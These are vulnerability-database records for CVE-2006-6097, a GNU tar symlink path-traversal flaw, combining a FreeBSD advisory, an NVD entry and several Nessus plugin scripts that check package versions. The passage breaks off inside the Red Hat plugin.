{"id": "44449BF7-C69B-11DB-9F82-000E0C2E438A", "bulletinFamily": "unix", "title": "gtar -- name mangling symlink vulnerability", "description": "\nProblem Description:\nSymlinks created using the \"GNUTYPE_NAMES\" tar extension can\n\t be absolute due to lack of proper sanity checks.\nImpact:\nIf an attacker can get a user to extract a specially crafted\n\t tar archive the attacker can overwrite arbitrary files with\n\t the permissions of the user running gtar. If file system\n\t permissions allow it, this may allow the attacker to overwrite\n\t important system file (if gtar is being run as root), or\n\t important user configuration files such as .tcshrc or .bashrc,\n\t which would allow the attacker to run arbitrary commands.\nWorkaround:\nUse \"bsdtar\", which is the default tar implementation in\n\t FreeBSD 5.3 and higher. For FreeBSD 4.x, bsdtar is available\n\t in the FreeBSD Ports Collection as\n\t ports/archivers/libarchive.\n", "published": "2006-12-06T00:00:00", "modified": "2016-08-09T00:00:00", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "https://vuxml.freebsd.org/freebsd/44449bf7-c69b-11db-9f82-000e0c2e438a.html", "reporter": "FreeBSD", "references": [], "cvelist": ["CVE-2006-6097"], "type": "freebsd", "lastseen": "2018-08-31T01:15:42", "history": [{"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "FreeBSD", "packageVersion": "5.5_9"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "FreeBSD", "packageVersion": "5.5"}], "bulletinFamily": "unix", "cvelist": ["CVE-2006-6097"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "\nProblem Description:\nSymlinks created using the \"GNUTYPE_NAMES\" tar extension can\n\t be absolute due to lack of proper sanity checks.\nImpact:\nIf an attacker can get a user to extract a specially crafted\n\t tar archive the attacker can overwrite arbitrary files with\n\t the permissions of the user running gtar. If file system\n\t permissions allow it, this may allow the attacker to overwrite\n\t important system file (if gtar is being run as root), or\n\t important user configuration files such as .tcshrc or .bashrc,\n\t which would allow the attacker to run arbitrary commands.\nWorkaround:\nUse \"bsdtar\", which is the default tar implementation in\n\t FreeBSD 5.3 and higher. For FreeBSD 4.x, bsdtar is available\n\t in the FreeBSD Ports Collection as\n\t ports/archivers/libarchive.\n", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "632b2ffc0179e695cd4e734b851e37ad4431bad7fd70f46858b22c872b998487", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "34fc62616f46e022a07318d302ad08d1", "key": "cvelist"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "29eb0a5e25d1f4c6626f91741ab39650", "key": "modified"}, {"hash": "c2e1b0e0d5590537cfda37811e1c868e", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f4d28fd785b0ab51bdf26eda81c04db4", "key": "description"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "7f9b6b26ba3e07e429e11655ddbca7bf", "key": "affectedPackage"}, {"hash": "ed710cc7569c5086f569ffa5f5f1d802", "key": "href"}, {"hash": "c2eb40e2b37762ce21369afec349d5b7", "key": "title"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/44449bf7-c69b-11db-9f82-000e0c2e438a.html", "id": "44449BF7-C69B-11DB-9F82-000E0C2E438A", "lastseen": "2018-08-30T19:15:56", "modified": "2016-08-09T00:00:00", "objectVersion": "1.3", "published": "2006-12-06T00:00:00", "references": [], "reporter": "FreeBSD", "title": "gtar -- name mangling symlink vulnerability", "type": "freebsd", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:15:56"}, {"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "FreeBSD", "packageVersion": "5.5_9"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "FreeBSD", "packageVersion": "5.5"}], "bulletinFamily": "unix", "cvelist": ["CVE-2006-6097"], "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "description": "\nProblem Description:\nSymlinks created using the \"GNUTYPE_NAMES\" tar extension can\n\t be absolute due to lack of proper sanity checks.\nImpact:\nIf an attacker can get a user to extract a specially crafted\n\t tar archive the attacker can overwrite arbitrary files with\n\t the permissions of the user running gtar. If file system\n\t permissions allow it, this may allow the attacker to overwrite\n\t important system file (if gtar is being run as root), or\n\t important user configuration files such as .tcshrc or .bashrc,\n\t which would allow the attacker to run arbitrary commands.\nWorkaround:\nUse \"bsdtar\", which is the default tar implementation in\n\t FreeBSD 5.3 and higher. For FreeBSD 4.x, bsdtar is available\n\t in the FreeBSD Ports Collection as\n\t ports/archivers/libarchive.\n", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "d18c063c2058658beaedf484fa92f6fa16ce7d1d23d1bacc349a5b9511a65a50", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "34fc62616f46e022a07318d302ad08d1", "key": "cvelist"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "29eb0a5e25d1f4c6626f91741ab39650", "key": "modified"}, {"hash": "c2e1b0e0d5590537cfda37811e1c868e", "key": "published"}, {"hash": "f4d28fd785b0ab51bdf26eda81c04db4", "key": "description"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "033863640fb136965d17e3a1c6345959", "key": "cvss"}, {"hash": "7f9b6b26ba3e07e429e11655ddbca7bf", "key": "affectedPackage"}, {"hash": "ed710cc7569c5086f569ffa5f5f1d802", "key": "href"}, {"hash": "c2eb40e2b37762ce21369afec349d5b7", "key": "title"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/44449bf7-c69b-11db-9f82-000e0c2e438a.html", "id": "44449BF7-C69B-11DB-9F82-000E0C2E438A", "lastseen": "2016-09-26T17:25:02", "modified": "2016-08-09T00:00:00", "objectVersion": "1.2", "published": "2006-12-06T00:00:00", "references": [], "reporter": "FreeBSD", "title": "gtar -- name mangling symlink vulnerability", "type": "freebsd", "viewCount": 0}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2016-09-26T17:25:02"}], "edition": 3, "hashmap": [{"key": "affectedPackage", "hash": "7f9b6b26ba3e07e429e11655ddbca7bf"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "34fc62616f46e022a07318d302ad08d1"}, {"key": "cvss", "hash": "033863640fb136965d17e3a1c6345959"}, {"key": "description", "hash": "f4d28fd785b0ab51bdf26eda81c04db4"}, {"key": "href", "hash": "ed710cc7569c5086f569ffa5f5f1d802"}, {"key": "modified", "hash": "29eb0a5e25d1f4c6626f91741ab39650"}, {"key": "published", "hash": "c2e1b0e0d5590537cfda37811e1c868e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a3dc630729e463135f4e608954fa6e19"}, {"key": "title", "hash": "c2eb40e2b37762ce21369afec349d5b7"}, {"key": "type", "hash": "1527e888767cdce15d200b870b39cfd0"}], "hash": "d18c063c2058658beaedf484fa92f6fa16ce7d1d23d1bacc349a5b9511a65a50", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "FreeBSD", "packageVersion": "5.5_9"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "FreeBSD", "packageVersion": "5.5"}]}

{"cve": [{"lastseen": "2017-10-11T11:06:52", "references": ["http://www.mandriva.com/security/advisories?name=MDKSA-2006:219", "http://support.avaya.com/elmodocs2/security/ASA-2007-015.htm", "http://rhn.redhat.com/errata/RHSA-2006-0749.html", "http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050812.html", "http://www.vupen.com/english/advisories/2007/1171", "http://lists.apple.com/archives/security-announce/2007/Mar/msg00002.html", "http://www.vupen.com/english/advisories/2007/0930", "http://security.freebsd.org/advisories/FreeBSD-SA-06:26.gtar.asc", "http://docs.info.apple.com/article.html?artnum=305214", "http://securitytracker.com/id?1017423", "http://www.securityfocus.com/bid/21235", "https://issues.rpath.com/browse/RPL-821", "https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=216937", "http://www.securityfocus.com/archive/1/archive/1/464268/100/0/threaded", "http://securityreason.com/securityalert/1918", "http://kb.vmware.com/KanisaPlatform/Publishing/817/2240267_f.SAL_Public.html", "http://www.trustix.org/errata/2006/0068/", "ftp://patches.sgi.com/support/free/security/advisories/20061202-01-P.asc", "http://www.ubuntu.com/usn/usn-385-1", "http://security.gentoo.org/glsa/glsa-200612-10.xml", "http://www.securityfocus.com/archive/1/archive/1/453286/100/0/threaded", "http://www.vmware.com/support/esx25/doc/esx-254-200702-patch.html", "http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.469379", "http://www.vupen.com/english/advisories/2006/5102", "http://www.debian.org/security/2006/dsa-1223", "http://www.openpkg.com/security/advisories/OpenPKG-SA-2006.038.html", "http://www.us-cert.gov/cas/techalerts/TA07-072A.html", "http://www.vupen.com/english/advisories/2006/4717"], "description": "GNU tar 1.16 and 1.15.1, and possibly other versions, allows user-assisted attackers to overwrite arbitrary files via a tar file that contains a GNUTYPE_NAMES record with a symbolic link, which is not properly handled by the extract_archive function in extract.c and extract_mangle function in mangle.c, a variant of CVE-2002-1216.", "edition": 2, "reporter": "NVD", "published": "2006-11-24T13:07:00", "title": "CVE-2006-6097", "type": "cve", "enchantments": {"score": {"modified": "2017-10-11T11:06:52", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10963", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10963"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-6097"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10963", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10963"}], "modified": "2017-10-10T21:31:24", "cpe": ["cpe:/a:gnu:tar:1.16", "cpe:/a:gnu:tar:1.15.1"], "id": "CVE-2006-6097", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6097", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:38:59", "references": ["https://security.gentoo.org/glsa/200612-10"], "pluginID": "23862", "description": "The remote host is affected by the vulnerability described in GLSA-200612-10 (Tar: Directory traversal vulnerability)\n\n Tar does not properly extract archive elements using the GNUTYPE_NAMES record name, allowing files to be created at arbitrary locations using symlinks. Once a symlink is extracted, files after the symlink in the archive will be extracted to the destination of the symlink.\n Impact :\n\n An attacker could entice a user to extract a specially crafted tar archive, possibly allowing for the overwriting of arbitrary files on the system extracting the archive.\n Workaround :\n\n There is no known workaround at this time.", "edition": 5, "reporter": "Tenable", "published": "2006-12-14T00:00:00", "title": "GLSA-200612-10 : Tar: Directory traversal vulnerability", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2018-08-10T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:tar"], "id": "GENTOO_GLSA-200612-10.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23862", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200612-10.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23862);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2006-6097\");\n script_xref(name:\"GLSA\", value:\"200612-10\");\n\n script_name(english:\"GLSA-200612-10 : Tar: Directory traversal vulnerability\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200612-10\n(Tar: Directory traversal vulnerability)\n\n Tar does not properly extract archive elements using the GNUTYPE_NAMES\n record name, allowing files to be created at arbitrary locations using\n symlinks. Once a symlink is extracted, files after the symlink in the\n archive will be extracted to the destination of the symlink.\n \nImpact :\n\n An attacker could entice a user to extract a specially crafted tar\n archive, possibly allowing for the overwriting of arbitrary files on\n the system extracting the archive.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200612-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Tar users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-arch/tar-1.16-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:tar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/11/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-arch/tar\", unaffected:make_list(\"ge 1.16-r2\"), vulnerable:make_list(\"lt 1.16-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Tar\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:52", "references": ["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=399845", "http://www.debian.org/security/2006/dsa-1223"], "pluginID": "23765", "description": "Teemu Salmela discovered a vulnerability in GNU tar that could allow a malicious user to overwrite arbitrary files by inducing the victim to attempt to extract a specially crafted tar file containing a GNUTYPE_NAMES record with a symbolic link.", "edition": 6, "reporter": "Tenable", "published": "2006-12-04T00:00:00", "title": "Debian DSA-1223-1 : tar - input validation error", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2018-07-20T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:tar", "cpe:/o:debian:debian_linux:3.1"], "id": "DEBIAN_DSA-1223.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23765", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1223. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23765);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/20 2:17:12\");\n\n script_cve_id(\"CVE-2006-6097\");\n script_bugtraq_id(21235);\n script_xref(name:\"DSA\", value:\"1223\");\n\n script_name(english:\"Debian DSA-1223-1 : tar - input validation error\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Teemu Salmela discovered a vulnerability in GNU tar that could allow a\nmalicious user to overwrite arbitrary files by inducing the victim to\nattempt to extract a specially crafted tar file containing a\nGNUTYPE_NAMES record with a symbolic link.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=399845\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1223\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tar package.\n\nFor the stable distribution (sarge), this problem has been fixed in\nversion 1.14-2.3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/11/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"tar\", reference:\"1.14-2.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:35:50", "references": ["http://support.novell.com/security/cve/CVE-2006-6097.html"], "pluginID": "29585", "description": "This security update fixes a directory traversal in tar, where unpacked symlinks could be followed outside of the directory where the tar file is unpacked. (CVE-2006-6097)\n\nThe problematic feature has been made optional and is disabled by default. It can be enabled by a commandline switch.", "edition": 4, "reporter": "Tenable", "published": "2007-12-13T00:00:00", "title": "SuSE 10 Security Update : tar (ZYPP Patch Number 2344)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2012-05-17T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_TAR-2344.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29585", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29585);\n script_version (\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2012/05/17 11:27:18 $\");\n\n script_cve_id(\"CVE-2006-6097\");\n\n script_name(english:\"SuSE 10 Security Update : tar (ZYPP Patch Number 2344)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This security update fixes a directory traversal in tar, where\nunpacked symlinks could be followed outside of the directory where the\ntar file is unpacked. (CVE-2006-6097)\n\nThe problematic feature has been made optional and is disabled by\ndefault. It can be enabled by a commandline switch.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-6097.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 2344.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"tar-1.15.1-23.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"tar-1.15.1-23.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:36", "references": ["http://rhn.redhat.com/errata/RHSA-2006-0749.html", "https://www.redhat.com/security/data/cve/CVE-2006-6097.html"], "pluginID": "23959", "description": "Updated tar packages that fix a path traversal flaw are now available.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThe GNU tar program saves many files together in one archive and can restore individual files (or all of the files) from that archive.\n\nTeemu Salmela discovered a path traversal flaw in the way GNU tar extracted archives. A malicious user could create a tar archive that could write to arbitrary files to which the user running GNU tar has write access. (CVE-2006-6097)\n\nUsers of tar should upgrade to this updated package, which contains a replacement backported patch to correct this issue.", "edition": 6, "reporter": "Tenable", "published": "2006-12-30T00:00:00", "title": "RHEL 2.1 / 3 / 4 : tar (RHSA-2006:0749)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6097"], "modified": "2018-08-13T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:tar"], "id": "REDHAT-RHSA-2006-0749.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23959", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0749. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23959);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2018/08/13 14:32:37\");\n\n script_cve_id(\"CVE-2006-6097\");\n script_xref(name:\"RHSA\", value:\"2006:0749\");\n\n script_name(english:\"RHEL 2.1 / 3 / 4 : tar (RHSA-2006:0749)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated tar packages that fix a path traversal flaw are now available.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe GNU tar program saves many files together in one archive and can\nrestore individual files (or all of the files) from that archive.\n\nTeemu Salmela discovered a path traversal flaw in the way GNU tar\nextracted archives. A malicious user could create a tar archive that\ncould write to arbitrary files to which the user running GNU tar has\nwrite access. (CVE-2006-6097)\n\nUsers of tar should upgrade to this updated package, which contains a\nreplacement backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2006-6097.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2006-0749.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected tar package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/11/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(2\\.1|3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif 